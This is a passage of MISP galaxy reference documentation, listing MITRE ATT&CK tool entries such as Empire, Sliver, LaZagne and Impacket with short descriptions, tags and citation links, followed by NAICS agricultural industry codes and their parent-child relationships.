https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://github.com/quasar/QuasarRAT

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

spwebmember - S0227

[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)

The tag is: misp-galaxy:mitre-tool="spwebmember - S0227"

spwebmember - S0227 is also known as:

  • spwebmember

spwebmember - S0227 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

Table 7892. Table References

Links

https://attack.mitre.org/software/S0227

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Remcos - S0332

[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)

The tag is: misp-galaxy:mitre-tool="Remcos - S0332"

Remcos - S0332 is also known as:

  • Remcos

Table 7893. Table References

Links

https://attack.mitre.org/software/S0332

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html

PoshC2 - S0378

[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)

The tag is: misp-galaxy:mitre-tool="PoshC2 - S0378"

PoshC2 - S0378 is also known as:

  • PoshC2

Table 7894. Table References

Links

https://attack.mitre.org/software/S0378

https://github.com/nettitude/PoshC2_Python

AdFind - S0552

[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)

The tag is: misp-galaxy:mitre-tool="AdFind - S0552"

AdFind - S0552 is also known as:

  • AdFind

Table 7895. Table References

Links

https://attack.mitre.org/software/S0552

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

RemoteUtilities - S0592

[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="RemoteUtilities - S0592"

RemoteUtilities - S0592 is also known as:

  • RemoteUtilities

Table 7896. Table References

Links

https://attack.mitre.org/software/S0592

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SILENTTRINITY - S0692

[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)

The tag is: misp-galaxy:mitre-tool="SILENTTRINITY - S0692"

SILENTTRINITY - S0692 is also known as:

  • SILENTTRINITY

Table 7897. Table References

Links

https://attack.mitre.org/software/S0692

https://github.com/byt3bl33d3r/SILENTTRINITY

https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html

Xbot - S0298

[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)

The tag is: misp-galaxy:mitre-tool="Xbot - S0298"

Xbot - S0298 has relationships with:

  • similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

Table 7898. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/

https://attack.mitre.org/software/S0298

Empire - S0363

[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)

The tag is: misp-galaxy:mitre-tool="Empire - S0363"

Empire - S0363 is also known as:

  • Empire

  • EmPyre

  • PowerShell Empire

Table 7899. Table References

Links

https://attack.mitre.org/software/S0363

https://github.com/PowerShellEmpire/Empire

https://github.com/dstepanic/attck_empire

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

Sliver - S0633

[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)

The tag is: misp-galaxy:mitre-tool="Sliver - S0633"

Sliver - S0633 is also known as:

  • Sliver

Table 7900. Table References

Links

https://attack.mitre.org/software/S0633

https://labs.bishopfox.com/tech-blog/sliver

RawDisk - S0364

[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-tool="RawDisk - S0364"

RawDisk - S0364 is also known as:

  • RawDisk

Table 7901. Table References

Links

https://attack.mitre.org/software/S0364

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp

LaZagne - S0349

[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)

The tag is: misp-galaxy:mitre-tool="LaZagne - S0349"

LaZagne - S0349 is also known as:

  • LaZagne

Table 7902. Table References

Links

https://attack.mitre.org/software/S0349

https://github.com/AlessandroZ/LaZagne

Impacket - S0357

[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)

The tag is: misp-galaxy:mitre-tool="Impacket - S0357"

Impacket - S0357 is also known as:

  • Impacket

Table 7903. Table References

Links

https://attack.mitre.org/software/S0357

https://www.secureauth.com/labs/open-source-tools/impacket

Ruler - S0358

[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)

The tag is: misp-galaxy:mitre-tool="Ruler - S0358"

Ruler - S0358 is also known as:

  • Ruler

Table 7904. Table References

Links

https://attack.mitre.org/software/S0358

https://github.com/sensepost/notruler

https://github.com/sensepost/ruler

Nltest - S0359

[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)

The tag is: misp-galaxy:mitre-tool="Nltest - S0359"

Nltest - S0359 is also known as:

  • Nltest

Table 7905. Table References

Links

https://attack.mitre.org/software/S0359

https://ss64.com/nt/nltest.html

Peirates - S0683

[Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)

The tag is: misp-galaxy:mitre-tool="Peirates - S0683"

Peirates - S0683 is also known as:

  • Peirates

Table 7906. Table References

Links

https://attack.mitre.org/software/S0683

https://github.com/inguardians/peirates

ShimRatReporter - S0445

[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary’s targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-tool="ShimRatReporter - S0445"

ShimRatReporter - S0445 is also known as:

  • ShimRatReporter

Table 7907. Table References

Links

https://attack.mitre.org/software/S0445

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

CARROTBALL - S0465

[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-tool="CARROTBALL - S0465"

CARROTBALL - S0465 is also known as:

  • CARROTBALL

Table 7908. Table References

Links

https://attack.mitre.org/software/S0465

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Wevtutil - S0645

[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)

The tag is: misp-galaxy:mitre-tool="Wevtutil - S0645"

Wevtutil - S0645 is also known as:

  • Wevtutil

Table 7909. Table References

Links

https://attack.mitre.org/software/S0645

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

ROADTools - S0684

[ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)

The tag is: misp-galaxy:mitre-tool="ROADTools - S0684"

ROADTools - S0684 is also known as:

  • ROADTools

Table 7910. Table References

Links

https://attack.mitre.org/software/S0684

https://github.com/dirkjanm/ROADtools

CrackMapExec - S0488

[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)

The tag is: misp-galaxy:mitre-tool="CrackMapExec - S0488"

CrackMapExec - S0488 is also known as:

  • CrackMapExec

Table 7911. Table References

Links

https://attack.mitre.org/software/S0488

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

Donut - S0695

[Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)

The tag is: misp-galaxy:mitre-tool="Donut - S0695"

Donut - S0695 is also known as:

  • Donut

Table 7912. Table References

Links

https://attack.mitre.org/software/S0695

https://github.com/TheWover/donut

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://thewover.github.io/Introducing-Donut/

AADInternals - S0677

[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)

The tag is: misp-galaxy:mitre-tool="AADInternals - S0677"

AADInternals - S0677 is also known as:

  • AADInternals

Table 7913. Table References

Links

https://attack.mitre.org/software/S0677

https://github.com/Gerenios/AADInternals

https://o365blog.com/aadinternals

https://o365blog.com/aadinternals/

Mythic - S0699

[Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)

The tag is: misp-galaxy:mitre-tool="Mythic - S0699"

Mythic - S0699 is also known as:

  • Mythic

Table 7914. Table References

Links

https://attack.mitre.org/software/S0699

https://docs.mythic-c2.net/

https://github.com/its-a-feature/Mythic

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617

NAICS

The North American Industry Classification System or NAICS is a classification of business establishments by type of economic activity (the process of production)..

NAICS is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Executive Office of the President Office of Management and Budget

11

Agriculture, Forestry, Fishing and Hunting

The tag is: misp-galaxy:naics="11"

11 has relationships with:

  • parent-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

111

Crop Production

The tag is: misp-galaxy:naics="111"

111 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

1111

Oilseed and Grain Farming

The tag is: misp-galaxy:naics="1111"

1111 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111199" with estimative-language:likelihood-probability="likely"

11111

Soybean Farming

The tag is: misp-galaxy:naics="11111"

11111 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111110" with estimative-language:likelihood-probability="likely"

111110

Soybean Farming

The tag is: misp-galaxy:naics="111110"

111110 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11111" with estimative-language:likelihood-probability="likely"

11112

Oilseed (except Soybean) Farming

The tag is: misp-galaxy:naics="11112"

11112 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111120" with estimative-language:likelihood-probability="likely"

111120

Oilseed (except Soybean) Farming

The tag is: misp-galaxy:naics="111120"

111120 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11112" with estimative-language:likelihood-probability="likely"

11113

Dry Pea and Bean Farming

The tag is: misp-galaxy:naics="11113"

11113 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111130" with estimative-language:likelihood-probability="likely"

111130

Dry Pea and Bean Farming

The tag is: misp-galaxy:naics="111130"

111130 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11113" with estimative-language:likelihood-probability="likely"

11114

Wheat Farming

The tag is: misp-galaxy:naics="11114"

11114 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111140" with estimative-language:likelihood-probability="likely"

111140

Wheat Farming

The tag is: misp-galaxy:naics="111140"

111140 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11114" with estimative-language:likelihood-probability="likely"

11115

Corn Farming

The tag is: misp-galaxy:naics="11115"

11115 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111150" with estimative-language:likelihood-probability="likely"

111150

Corn Farming

The tag is: misp-galaxy:naics="111150"

111150 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11115" with estimative-language:likelihood-probability="likely"

11116

Rice Farming

The tag is: misp-galaxy:naics="11116"

11116 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111160" with estimative-language:likelihood-probability="likely"

111160

Rice Farming

The tag is: misp-galaxy:naics="111160"

111160 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11116" with estimative-language:likelihood-probability="likely"

11119

Other Grain Farming

The tag is: misp-galaxy:naics="11119"

11119 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

111191

Oilseed and Grain Combination Farming

The tag is: misp-galaxy:naics="111191"

111191 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

111199

All Other Grain Farming

The tag is: misp-galaxy:naics="111199"

111199 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

1112

Vegetable and Melon Farming

The tag is: misp-galaxy:naics="1112"

1112 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111219" with estimative-language:likelihood-probability="likely"

11121

Vegetable and Melon Farming

The tag is: misp-galaxy:naics="11121"

11121 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

111211

Potato Farming

The tag is: misp-galaxy:naics="111211"

111211 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

111219

Other Vegetable (except Potato) and Melon Farming

The tag is: misp-galaxy:naics="111219"

111219 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

1113

Fruit and Tree Nut Farming

The tag is: misp-galaxy:naics="1113"

1113 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111339" with estimative-language:likelihood-probability="likely"

11131

Orange Groves

The tag is: misp-galaxy:naics="11131"

11131 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111310" with estimative-language:likelihood-probability="likely"

111310

Orange Groves

The tag is: misp-galaxy:naics="111310"

111310 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11131" with estimative-language:likelihood-probability="likely"

11132

Citrus (except Orange) Groves

The tag is: misp-galaxy:naics="11132"

11132 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111320" with estimative-language:likelihood-probability="likely"

111320

Citrus (except Orange) Groves

The tag is: misp-galaxy:naics="111320"

111320 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11132" with estimative-language:likelihood-probability="likely"

11133

Noncitrus Fruit and Tree Nut Farming

The tag is: misp-galaxy:naics="11133"

11133 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111331

Apple Orchards

The tag is: misp-galaxy:naics="111331"

111331 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111332

Grape Vineyards

The tag is: misp-galaxy:naics="111332"

111332 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111333

Strawberry Farming

The tag is: misp-galaxy:naics="111333"

111333 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111334

Berry (except Strawberry) Farming

The tag is: misp-galaxy:naics="111334"

111334 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111335

Tree Nut Farming

The tag is: misp-galaxy:naics="111335"

111335 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111336

Fruit and Tree Nut Combination Farming

The tag is: misp-galaxy:naics="111336"

111336 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111339

Other Noncitrus Fruit Farming

The tag is: misp-galaxy:naics="111339"

111339 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

1114

Greenhouse, Nursery, and Floriculture Production

The tag is: misp-galaxy:naics="1114"

1114 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111422" with estimative-language:likelihood-probability="likely"

11141

Food Crops Grown Under Cover

The tag is: misp-galaxy:naics="11141"

11141 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111411

Mushroom Production

The tag is: misp-galaxy:naics="111411"

111411 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111419

Other Food Crops Grown Under Cover

The tag is: misp-galaxy:naics="111419"

111419 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

11142

Nursery and Floriculture Production

The tag is: misp-galaxy:naics="11142"

11142 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111421

Nursery and Tree Production

The tag is: misp-galaxy:naics="111421"

111421 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111422

Floriculture Production

The tag is: misp-galaxy:naics="111422"

111422 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

1119

Other Crop Farming

The tag is: misp-galaxy:naics="1119"

1119 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111998" with estimative-language:likelihood-probability="likely"

11191

Tobacco Farming

The tag is: misp-galaxy:naics="11191"

11191 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111910" with estimative-language:likelihood-probability="likely"

111910

Tobacco Farming

The tag is: misp-galaxy:naics="111910"

111910 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11191" with estimative-language:likelihood-probability="likely"

11192

Cotton Farming

The tag is: misp-galaxy:naics="11192"

11192 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111920" with estimative-language:likelihood-probability="likely"

111920

Cotton Farming

The tag is: misp-galaxy:naics="111920"

111920 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11192" with estimative-language:likelihood-probability="likely"

11193

Sugarcane Farming

The tag is: misp-galaxy:naics="11193"

11193 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111930" with estimative-language:likelihood-probability="likely"

111930

Sugarcane Farming

The tag is: misp-galaxy:naics="111930"

111930 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11193" with estimative-language:likelihood-probability="likely"

11194

Hay Farming

The tag is: misp-galaxy:naics="11194"

11194 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111940" with estimative-language:likelihood-probability="likely"

111940

Hay Farming

The tag is: misp-galaxy:naics="111940"

111940 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11194" with estimative-language:likelihood-probability="likely"

11199

All Other Crop Farming

The tag is: misp-galaxy:naics="11199"

11199 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111991

Sugar Beet Farming

The tag is: misp-galaxy:naics="111991"

111991 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111992

Peanut Farming

The tag is: misp-galaxy:naics="111992"

111992 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111998

All Other Miscellaneous Crop Farming

The tag is: misp-galaxy:naics="111998"

111998 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

112

Animal Production and Aquaculture

The tag is: misp-galaxy:naics="112"

112 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

